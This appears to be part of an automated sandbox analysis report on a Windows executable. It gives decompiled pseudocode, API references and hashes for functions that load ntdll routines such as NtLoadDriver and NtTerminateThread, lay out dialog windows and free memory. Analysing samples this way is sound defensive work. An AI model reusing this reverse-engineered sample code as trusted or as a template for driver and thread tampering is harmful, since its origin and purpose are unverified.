                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 975042529-0
                                                                                                                                                                                                                          • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                                                                                                                          • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                          			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                                                                                                                                                          0x004097b1
                                                                                                                                                                                                                          0x004097b9
                                                                                                                                                                                                                          0x004097bb
                                                                                                                                                                                                                          0x004097be
                                                                                                                                                                                                                          0x004097c3
                                                                                                                                                                                                                          0x004097ca
                                                                                                                                                                                                                          0x004097de
                                                                                                                                                                                                                          0x004097de
                                                                                                                                                                                                                          0x004097e3
                                                                                                                                                                                                                          0x004097e5
                                                                                                                                                                                                                          0x004097e5
                                                                                                                                                                                                                          0x004097ec
                                                                                                                                                                                                                          0x004097f3
                                                                                                                                                                                                                          0x004097f6
                                                                                                                                                                                                                          0x004097fe
                                                                                                                                                                                                                          0x00409802
                                                                                                                                                                                                                          0x00409805
                                                                                                                                                                                                                          0x0040980a
                                                                                                                                                                                                                          0x0040980d
                                                                                                                                                                                                                          0x00409810
                                                                                                                                                                                                                          0x00409822
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409827
                                                                                                                                                                                                                          0x0040982a
                                                                                                                                                                                                                          0x004098da
                                                                                                                                                                                                                          0x004098da
                                                                                                                                                                                                                          0x004098dc
                                                                                                                                                                                                                          0x004098e0
                                                                                                                                                                                                                          0x004098e9
                                                                                                                                                                                                                          0x004098ec
                                                                                                                                                                                                                          0x004098f6
                                                                                                                                                                                                                          0x004098f6
                                                                                                                                                                                                                          0x004098e2
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004098e2
                                                                                                                                                                                                                          0x00409830
                                                                                                                                                                                                                          0x00409833
                                                                                                                                                                                                                          0x00409838
                                                                                                                                                                                                                          0x0040983b
                                                                                                                                                                                                                          0x0040983e
                                                                                                                                                                                                                          0x0040985f
                                                                                                                                                                                                                          0x0040985f
                                                                                                                                                                                                                          0x00409861
                                                                                                                                                                                                                          0x00409863
                                                                                                                                                                                                                          0x0040989e
                                                                                                                                                                                                                          0x004098b1
                                                                                                                                                                                                                          0x004098b8
                                                                                                                                                                                                                          0x004098c0
                                                                                                                                                                                                                          0x004098c5
                                                                                                                                                                                                                          0x004098d5
                                                                                                                                                                                                                          0x00409865
                                                                                                                                                                                                                          0x00409865
                                                                                                                                                                                                                          0x00409865
                                                                                                                                                                                                                          0x0040986c
                                                                                                                                                                                                                          0x00409878
                                                                                                                                                                                                                          0x0040987f
                                                                                                                                                                                                                          0x0040988a
                                                                                                                                                                                                                          0x0040988f
                                                                                                                                                                                                                          0x0040988f
                                                                                                                                                                                                                          0x0040986c
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409863
                                                                                                                                                                                                                          0x00409840
                                                                                                                                                                                                                          0x00409843
                                                                                                                                                                                                                          0x00409846
                                                                                                                                                                                                                          0x0040984b
                                                                                                                                                                                                                          0x00409852
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409854
                                                                                                                                                                                                                          0x0040985d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040985d
                                                                                                                                                                                                                          0x00409894
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409894

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409805
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040988A
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004098C0
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3641025914-0
                                                                                                                                                                                                                          • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                                                                                                                          • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                          			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                                                                                                                                                          0x004067ac
                                                                                                                                                                                                                          0x004067af
                                                                                                                                                                                                                          0x004067b5
                                                                                                                                                                                                                          0x004067ba
                                                                                                                                                                                                                          0x004067bf
                                                                                                                                                                                                                          0x004067c1
                                                                                                                                                                                                                          0x004067c6
                                                                                                                                                                                                                          0x004067c7
                                                                                                                                                                                                                          0x004067cc
                                                                                                                                                                                                                          0x004067cd
                                                                                                                                                                                                                          0x004067d2
                                                                                                                                                                                                                          0x004067d4
                                                                                                                                                                                                                          0x004067d9
                                                                                                                                                                                                                          0x004067da
                                                                                                                                                                                                                          0x004067df
                                                                                                                                                                                                                          0x004067e0
                                                                                                                                                                                                                          0x004067e5
                                                                                                                                                                                                                          0x004067e7
                                                                                                                                                                                                                          0x004067ec
                                                                                                                                                                                                                          0x004067ed
                                                                                                                                                                                                                          0x004067f2
                                                                                                                                                                                                                          0x004067f3
                                                                                                                                                                                                                          0x004067f8
                                                                                                                                                                                                                          0x004067fa
                                                                                                                                                                                                                          0x004067ff
                                                                                                                                                                                                                          0x00406800
                                                                                                                                                                                                                          0x00406805
                                                                                                                                                                                                                          0x00406806
                                                                                                                                                                                                                          0x00406808
                                                                                                                                                                                                                          0x0040680f
                                                                                                                                                                                                                          0x00406810
                                                                                                                                                                                                                          0x00406812
                                                                                                                                                                                                                          0x00406817
                                                                                                                                                                                                                          0x0040681e
                                                                                                                                                                                                                          0x00406828
                                                                                                                                                                                                                          0x0040682b
                                                                                                                                                                                                                          0x0040682c
                                                                                                                                                                                                                          0x0040681e
                                                                                                                                                                                                                          0x00406835
                                                                                                                                                                                                                          0x00406839
                                                                                                                                                                                                                          0x00406841

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                                                                                                                          • free.MSVCRT(00000000), ref: 00406839
                                                                                                                                                                                                                            • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2241099983-0
                                                                                                                                                                                                                          • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                                                                                                                          • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                                                                                                                                                          0x00405d03
                                                                                                                                                                                                                          0x00405d06
                                                                                                                                                                                                                          0x00405d10
                                                                                                                                                                                                                          0x00405d17
                                                                                                                                                                                                                          0x00405d22
                                                                                                                                                                                                                          0x00405d32
                                                                                                                                                                                                                          0x00405d40
                                                                                                                                                                                                                          0x00405d48
                                                                                                                                                                                                                          0x00405d4e
                                                                                                                                                                                                                          0x00405d54
                                                                                                                                                                                                                          0x00405d59
                                                                                                                                                                                                                          0x00405d5c
                                                                                                                                                                                                                          0x00405d61
                                                                                                                                                                                                                          0x00405d67

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00405D0A
                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00405D17
                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 00405D22
                                                                                                                                                                                                                          • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                                                          • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                                                                                                                          • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                          			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                                                                                                                                                          0x004083dc
                                                                                                                                                                                                                          0x004083e2
                                                                                                                                                                                                                          0x004083e9
                                                                                                                                                                                                                          0x004083ea
                                                                                                                                                                                                                          0x004083eb
                                                                                                                                                                                                                          0x004083f3
                                                                                                                                                                                                                          0x004083f6
                                                                                                                                                                                                                          0x004083f8
                                                                                                                                                                                                                          0x00408401
                                                                                                                                                                                                                          0x00408404
                                                                                                                                                                                                                          0x00408407
                                                                                                                                                                                                                          0x00408409
                                                                                                                                                                                                                          0x0040840c
                                                                                                                                                                                                                          0x00408413
                                                                                                                                                                                                                          0x0040841d
                                                                                                                                                                                                                          0x00408427
                                                                                                                                                                                                                          0x0040842c
                                                                                                                                                                                                                          0x0040842f
                                                                                                                                                                                                                          0x00408432
                                                                                                                                                                                                                          0x00408435
                                                                                                                                                                                                                          0x00408438
                                                                                                                                                                                                                          0x00408439
                                                                                                                                                                                                                          0x0040843e
                                                                                                                                                                                                                          0x0040843f
                                                                                                                                                                                                                          0x00408442
                                                                                                                                                                                                                          0x0040844a

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$??2@??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1252195045-0
                                                                                                                                                                                                                          • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                                                                                                                          • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                                                          			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                                                                                                                                                          0x00406746
                                                                                                                                                                                                                          0x00406746
                                                                                                                                                                                                                          0x0040674f
                                                                                                                                                                                                                          0x00406751
                                                                                                                                                                                                                          0x00406752
                                                                                                                                                                                                                          0x00406757
                                                                                                                                                                                                                          0x00406758
                                                                                                                                                                                                                          0x0040675d
                                                                                                                                                                                                                          0x0040675f
                                                                                                                                                                                                                          0x00406760
                                                                                                                                                                                                                          0x00406765
                                                                                                                                                                                                                          0x00406766
                                                                                                                                                                                                                          0x0040676e
                                                                                                                                                                                                                          0x00406770
                                                                                                                                                                                                                          0x00406771
                                                                                                                                                                                                                          0x00406776
                                                                                                                                                                                                                          0x00406777
                                                                                                                                                                                                                          0x0040677f
                                                                                                                                                                                                                          0x00406781
                                                                                                                                                                                                                          0x00406785
                                                                                                                                                                                                                          0x00406787
                                                                                                                                                                                                                          0x00406788
                                                                                                                                                                                                                          0x0040678e
                                                                                                                                                                                                                          0x0040678e
                                                                                                                                                                                                                          0x00406790
                                                                                                                                                                                                                          0x00406791
                                                                                                                                                                                                                          0x00406796
                                                                                                                                                                                                                          0x00406798
                                                                                                                                                                                                                          0x0040679e
                                                                                                                                                                                                                          0x004067a1
                                                                                                                                                                                                                          0x004067a4
                                                                                                                                                                                                                          0x004067ab

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                                                                                                                          • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                          			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                                                                                                                                                          0x0040aba8
                                                                                                                                                                                                                          0x0040aba9
                                                                                                                                                                                                                          0x0040abb0
                                                                                                                                                                                                                          0x0040abb2
                                                                                                                                                                                                                          0x0040abb5
                                                                                                                                                                                                                          0x0040ac19
                                                                                                                                                                                                                          0x0040ac2c
                                                                                                                                                                                                                          0x0040ac2e
                                                                                                                                                                                                                          0x0040ac36
                                                                                                                                                                                                                          0x0040ac39
                                                                                                                                                                                                                          0x0040ac39
                                                                                                                                                                                                                          0x0040ac1b
                                                                                                                                                                                                                          0x0040ac21
                                                                                                                                                                                                                          0x0040ac21
                                                                                                                                                                                                                          0x0040abb7
                                                                                                                                                                                                                          0x0040abcb
                                                                                                                                                                                                                          0x0040abce
                                                                                                                                                                                                                          0x0040abd7
                                                                                                                                                                                                                          0x0040abe6
                                                                                                                                                                                                                          0x0040abf6
                                                                                                                                                                                                                          0x0040abfe
                                                                                                                                                                                                                          0x0040ac09
                                                                                                                                                                                                                          0x0040ac0f
                                                                                                                                                                                                                          0x0040ac12
                                                                                                                                                                                                                          0x0040ac4f

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
